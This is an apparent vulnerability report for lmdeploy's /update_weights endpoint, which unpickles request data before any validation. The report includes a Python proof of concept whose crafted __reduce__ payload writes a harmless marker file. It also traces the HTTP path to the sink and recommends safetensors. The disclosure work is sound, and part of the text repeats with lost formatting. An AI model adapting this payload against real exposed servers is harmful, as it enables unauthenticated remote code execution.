Checklist
Describe the bug
POST /update_weights accepts the JSON field serialized_named_tensors as a str | list[str] | dict and forwards the request object directly to the backend weight-update implementation.
When the value is a string, both backend paths deserialize request-controlled bytes with multiprocessing.reduction.ForkingPickler.loads(...):
- TurboMind backend:
lmdeploy/turbomind/turbomind.py, TurboMind.update_params
- PyTorch backend:
lmdeploy/pytorch/engine/model_agent/agent.py, ModelAgent.update_params
In CPython, ForkingPickler.loads resolves to native _pickle.loads. This means a remote HTTP request body can reach native pickle deserialization before any tensor/weight structure validation. Pickle reconstruction callbacks can run during loading, so this is an unsafe deserialization issue in the API server process.
Since the endpoint lacks authentication by default and binds to a public-facing address (0.0.0.0), this flaw allows any remote attacker who can reach the server to execute arbitrary system commands via crafted reduce callbacks during deserialization, effectively granting unauthenticated remote code execution (RCE) without any prior credentials.
The API server defaults make the path easier to expose accidentally:
lmdeploy serve api_server defaults to --server-name 0.0.0.0
api_keys defaults to None
- authentication middleware is only installed when non-empty API keys are configured
Reproduction
From a checkout of lmdeploy, I used this local harness. It stubs heavyweight CUDA/model dependencies, imports the target lmdeploy/turbomind/turbomind.py file, and calls the real TurboMind.update_params method. The marker appears before the later expected TypeError, showing that deserialization happened before weight-shape/structure handling.
python repro_update_weights_deser.py
repro_update_weights_deser.py:
import base64
import importlib.util
import pickle
import sys
import types
from pathlib import Path
repo = Path.cwd()
out = Path("update_weights_deser_marker.txt").resolve()
class Marker:
def __reduce__(self):
return (out.write_text, ("target update_params deserialized payload\n",))
class _Cuda:
@staticmethod
def device(_dev):
class Ctx:
def __enter__(self):
return None
def __exit__(self, exc_type, exc, tb):
return False
return Ctx()
@staticmethod
def current_device():
return 0
def install_stubs():
torch = types.ModuleType("torch")
torch.Tensor = object
torch.cuda = _Cuda
torch.IntTensor = lambda value: value
torch.from_dlpack = lambda value: value
sys.modules["torch"] = torch
pybase64 = types.ModuleType("pybase64")
pybase64.b64decode = base64.b64decode
sys.modules["pybase64"] = pybase64
lmdeploy = types.ModuleType("lmdeploy")
lmdeploy.__file__ = str(repo / "lmdeploy" / "__init__.py")
lmdeploy.__path__ = [str(repo / "lmdeploy")]
sys.modules["lmdeploy"] = lmdeploy
messages = types.ModuleType("lmdeploy.messages")
for name in [
"EngineOutput",
"GenerationConfig",
"ResponseType",
"ScheduleMetrics",
"TurbomindEngineConfig",
]:
setattr(messages, name, type(name, (), {}))
sys.modules["lmdeploy.messages"] = messages
protocol = types.ModuleType("lmdeploy.serve.openai.protocol")
protocol.UpdateParamsRequest = type("UpdateParamsRequest", (), {})
sys.modules["lmdeploy.serve"] = types.ModuleType("lmdeploy.serve")
sys.modules["lmdeploy.serve.openai"] = types.ModuleType("lmdeploy.serve.openai")
sys.modules["lmdeploy.serve.openai.protocol"] = protocol
tokenizer = types.ModuleType("lmdeploy.tokenizer")
tokenizer.Tokenizer = type("Tokenizer", (), {})
sys.modules["lmdeploy.tokenizer"] = tokenizer
utils = types.ModuleType("lmdeploy.utils")
utils.get_logger = lambda _name=None: types.SimpleNamespace(
info=lambda *a, **k: None,
warning=lambda *a, **k: None,
error=lambda *a, **k: None,
debug=lambda *a, **k: None,
)
utils.get_max_batch_size = lambda _device: 1
utils.get_model = lambda model, *a, **k: model
sys.modules["lmdeploy.utils"] = utils
tm_pkg = types.ModuleType("lmdeploy.turbomind")
tm_pkg.__path__ = [str(repo / "lmdeploy" / "turbomind")]
sys.modules["lmdeploy.turbomind"] = tm_pkg
supported = types.ModuleType("lmdeploy.turbomind.supported_models")
supported.is_supported = lambda *a, **k: True
sys.modules["lmdeploy.turbomind.supported_models"] = supported
tm_native = types.ModuleType("_turbomind")
tm_native.TensorMap = dict
tm_native.DataType = types.SimpleNamespace(TYPE_UINT32=1, TYPE_INT32=2)
sys.modules["_turbomind"] = tm_native
sys.modules["_xgrammar"] = types.ModuleType("_xgrammar")
tokenizer_info = types.ModuleType("lmdeploy.turbomind.tokenizer_info")
tokenizer_info.TokenizerInfo = type("TokenizerInfo", (), {})
sys.modules["lmdeploy.turbomind.tokenizer_info"] = tokenizer_info
def load_target_module():
path = repo / "lmdeploy" / "turbomind" / "turbomind.py"
spec = importlib.util.spec_from_file_location("lmdeploy.turbomind.turbomind", path)
mod = importlib.util.module_from_spec(spec)
sys.modules[spec.name] = mod
spec.loader.exec_module(mod)
return mod
if out.exists():
out.unlink()
install_stubs()
target = load_target_module()
payload = base64.b64encode(pickle.dumps(Marker())).decode()
request = types.SimpleNamespace(serialized_named_tensors=payload, finished=False)
self_obj = types.SimpleNamespace(devices=[0])
print("loads_module", getattr(pickle.loads, "__module__", None))
print("marker_before", out.exists())
try:
target.TurboMind.update_params(self_obj, request)
except Exception as exc:
print("target_exception_after_loads", type(exc).__name__, str(exc))
print("marker_after", out.exists())
if out.exists():
print("marker_text", out.read_text().strip())
Observed output:
loads_module _pickle
marker_before False
target_exception_after_loads TypeError 'int' object is not iterable
marker_after True
marker_text target update_params deserialized payload
The TypeError is expected because this harness intentionally uses a harmless marker object instead of a real weight iterator. The important observation is that the marker file is written before the later weight-handling error.
A real HTTP path to the same sink is:
POST /update_weights
-> UpdateParamsRequest.serialized_named_tensors
-> api_server.update_params(...)
-> VariableInterface.async_engine.engine.update_params(request)
-> pybase64.b64decode(request.serialized_named_tensors)
-> ForkingPickler.loads(...)
-> native _pickle.loads(...)
Environment
The issue is source-level and the local harness does not require a model or GPU.
Manual environment used for the local verification:
Repo commit: d9b2613182f1f94225b33239fd8dcc8903a984ce
OS: Ubuntu 24.04.3 LTS under WSL2
Python: 3.13.9
GCC/G++: 13.3.0
Error traceback
The local harness output is:
loads_module _pickle
marker_before False
target_exception_after_loads TypeError 'int' object is not iterable
marker_after True
marker_text target update_params deserialized payload
The exception happens after `_pickle.loads` returns and after the marker side effect has occurred.
The root cause appears to be accepting pickle-serialized weight data over HTTP and loading it before any schema, type, signature, or allowlist validation.
Avoid pickle for HTTP weight updates. Prefer a safe tensor serialization format such as `safetensors` plus explicit metadata validation.
Checklist
Describe the bug
POST /update_weightsaccepts the JSON fieldserialized_named_tensorsas astr | list[str] | dictand forwards the request object directly to the backend weight-update implementation.When the value is a string, both backend paths deserialize request-controlled bytes with
multiprocessing.reduction.ForkingPickler.loads(...):lmdeploy/turbomind/turbomind.py,TurboMind.update_paramslmdeploy/pytorch/engine/model_agent/agent.py,ModelAgent.update_paramsIn CPython,
ForkingPickler.loadsresolves to native_pickle.loads. This means a remote HTTP request body can reach native pickle deserialization before any tensor/weight structure validation. Pickle reconstruction callbacks can run during loading, so this is an unsafe deserialization issue in the API server process.Since the endpoint lacks authentication by default and binds to a public-facing address (0.0.0.0), this flaw allows any remote attacker who can reach the server to execute arbitrary system commands via crafted reduce callbacks during deserialization, effectively granting unauthenticated remote code execution (RCE) without any prior credentials.
The API server defaults make the path easier to expose accidentally:
lmdeploy serve api_serverdefaults to--server-name 0.0.0.0api_keysdefaults toNoneReproduction
From a checkout of
lmdeploy, I used this local harness. It stubs heavyweight CUDA/model dependencies, imports the targetlmdeploy/turbomind/turbomind.pyfile, and calls the realTurboMind.update_paramsmethod. The marker appears before the later expectedTypeError, showing that deserialization happened before weight-shape/structure handling.repro_update_weights_deser.py:Observed output:
The
TypeErroris expected because this harness intentionally uses a harmless marker object instead of a real weight iterator. The important observation is that the marker file is written before the later weight-handling error.A real HTTP path to the same sink is:
Environment
Error traceback